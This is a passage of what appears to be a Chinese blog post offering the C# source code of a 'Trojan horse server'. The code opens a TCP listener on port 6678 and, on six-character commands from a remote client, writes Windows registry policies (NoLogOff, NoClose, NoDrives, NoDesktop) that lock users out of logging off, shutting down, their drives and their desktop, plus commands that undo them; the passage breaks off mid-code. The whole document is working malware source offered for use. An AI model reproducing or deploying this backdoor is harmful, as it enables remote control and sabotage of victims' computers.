特洛伊木马服务器源代码(C#)

类别:.NET开发 点击:0 评论:0 推荐:

特洛伊木马服务器
//wgscd 2004-12  QQ:153964481
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using Microsoft.Win32;


namespace server
{
 /// <summary>
 /// Form1 的摘要说明。
 /// </summary>
 public class Form1 : System.Windows.Forms.Form
 {
  /// <summary>
  /// 必需的设计器变量。
  /// </summary>
  private System.ComponentModel.Container components = null;

  private TcpListener listener;
  private string mystr="您好!非常抱歉,您的注册表:";
  private RegistryKey  rrr=Registry.LocalMachine;
  private RegistryKey key1;


  public Form1()
  {
   //
   // Windows 窗体设计器支持所必需的
   //
   InitializeComponent();
  {int port =6678;
   listener=new TcpListener(port);
   listener.Start();
   
   Thread thread=new Thread(new ThreadStart(target));
   thread.Start();

  }

   //
   // TODO: 在 InitializeComponent 调用后添加任何构造函数代码
   //
  }
  public void target()
  {
   
   Socket socket= listener.AcceptSocket();
   
   while(socket.Connected)
   {

    
    byte[] by=new Byte[6];
    int i=socket.Receive(by,by.Length,0);
    
    string ss=System.Text.Encoding.ASCII.GetString(by);
    //OOOOOOOOOOOOOOOOOOOOOOOOOOO以下是修改注册表OOOOOOOOOOOOOOOOOOOOOOOOOOO   
     
    //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 
    if(ss=="jiance")
    {
     string str="hjc";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
     
    }
    if(ss=="zx1000")
    {
    
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff被修改!请将它置为0!";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",1);
       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff被修改!请将它置为0!";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    }//if(ss=="")
    //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    //****************************************************************************
    if(ss=="zx0100")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoClose",1);
      key1.Close();
      mystr=mystr+"LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose被修改!请将它置为0!";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoClose",1);
       key2.Close();
       mystr=mystr+"LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose被修改!请将它置为0!";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    
    
    
    }//if(ss=="zx0100"){
    //****************************************************************************

    //++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    if(ss=="zx0010")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDrives",12);
      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDrives",12);
       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    
    }//if
    //++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    //====================================================================

    if(ss=="zx0001")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDesktop",1);
      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDesktop",1);
       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //=========================================================================
    //$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


    if(ss=="zx1100")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoClose",1);
      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoClose",1);
       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    
    //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    if(ss=="zx1010")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoDrives",12);
      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoDrives",12);
       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //**************************************************
    if(ss=="zx1001")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoDesktop",1);
      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDesktop被修改!请将它置为0";

     }
     catch(Exception ee){MessageBox.Show(ee.Message);}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoDesktop",1);
       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************************
    if(ss=="zx0110")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
                        key1.SetValue("NoClose",1);
                        key1.SetValue("NoDrives",12);

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoClose",1);
                            key2.SetValue("NoDrives",12);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************************
    if(ss=="zx0101")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoClose",1);
      key1.SetValue("NoDesktop",1);

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoClose",1);
       key2.SetValue("NoDesktop",1);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************
    if(ss=="zx0011")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDrives",12);
      key1.SetValue("NoDesktop",1);


      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDrives",12);
       key2.SetValue("NoDesktop",1);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    
    //************************************
    if(ss=="zx1110")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoClose",1);
      key1.SetValue("NoDrives",12);

 

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoClose",1);
       key2.SetValue("NoDrives",12);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if

    //**************************************
    if(ss=="zx1101")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoClose",1);
      key1.SetValue("NoDesktop",1);

 

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoClose",1);
       key2.SetValue("NoDesktop",1);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
//******************************************
    if(ss=="zx1011")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoDrives",12);
      key1.SetValue("NoDesktop",1);

 

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoDrives",12);
       key2.SetValue("NoDesktop",1);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoDrives、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if

    //********************************************
    if(ss=="zx0111")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDrives",12);
      key1.SetValue("NoClose",1);
      key1.SetValue("NoDesktop",1);

 

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDrives",12);
       key2.SetValue("NoClose",1);
       key2.SetValue("NoDesktop",1);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************************
    if(ss=="zx1111")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",1);
      key1.SetValue("NoClose",1);
      key1.SetValue("NoDrives",12);
      key1.SetValue("NoDesktop",1);

 


      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives、NoDesktop被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",1);
       key2.SetValue("NoClose",1);
       key2.SetValue("NoDrives",12);
       key2.SetValue("NoDesktop",1);

       key2.Close();
       mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives、NoDesktop被修改!请将它置为0";

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //*********************************************
    //OOOOOOOOOOOOOOOOOOOOOOOOOOO以上是修改注册表OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO

//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以下是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPPPPP

     
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&   
    
    if(ss=="zs1000")
         {
     
          try
          {
           key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
           key1.SetValue("NoLogOff",0);
           key1.Close();
     

          }
          catch{}
          if(key1==null)
          {
           try
           {
            RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
            key2.SetValue("NoLogOff",0);
            key2.Close();
    

           }//try
           catch{}
          }//if(key1==null){
          string str="hkz";
          byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
          socket.Send(bytee,bytee.Length,0);
    

         }//if(ss=="")
    //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    //***********************************************************************
    if(ss=="zs0100")
    {
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoClose",0);
      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoClose",0);
       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    
    
    
    }//if(ss=="zx0100"){
    //********************************************************************
    //++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    if(ss=="zs0010")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDrives",0);
      key1.Close();
      
     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDrives",0);
       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    
    }//if
    //+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    //==================================================================


    if(ss=="zs0001")
    {
    
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDesktop",0);
      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDesktop",0);
       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //=========================================================================
    if(ss=="zs1100")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoClose",0);
      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoClose",0);
       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    
    //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    if(ss=="zs1010")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoDrives",0);
      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoDrives",0);
       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //**************************************************
    if(ss=="zs1001")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoDesktop",0);
      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoDesktop",0);
       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************************
    if(ss=="zs0110")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoClose",0);
      key1.SetValue("NoDrives",0);

      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoClose",0);
       key2.SetValue("NoDrives",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************************
    if(ss=="zs0101")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoClose",0);
      key1.SetValue("NoDesktop",0);

      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoClose",0);
       key2.SetValue("NoDesktop",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //********************************
    if(ss=="zs0011")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoDrives",0);
      key1.SetValue("NoDesktop",0);


      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoDrives",0);
       key2.SetValue("NoDesktop",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    
    //************************************
    if(ss=="zs1110")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoClose",0);
      key1.SetValue("NoDrives",0);

 

      key1.Close();
      mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLogOff、NoClose、NoDrives被修改!请将它置为0";

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoClose",0);
       key2.SetValue("NoDrives",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if

    //**************************************
    if(ss=="zs1101")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoClose",0);
      key1.SetValue("NoDesktop",0);

 

      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
       RegistryKey  key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
                          
       key2.SetValue("NoLogOff",0);
       key2.SetValue("NoClose",0);
       key2.SetValue("NoDesktop",0);

       key2.Close();
       

      }//try
      catch{}
     }//if(key1==null){
     string str="hkz";
     byte[]  bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
     socket.Send(bytee,bytee.Length,0);
    

    
    }//if
    //******************************************
    if(ss=="zs1011")
    {
     
     try
     {
      key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
      
      key1.SetValue("NoLogOff",0);
      key1.SetValue("NoDrives",0);
      key1.SetValue("NoDesktop",0);

 

      key1.Close();
      

     }
     catch{}
     if(key1==null)
     {
      try
      {
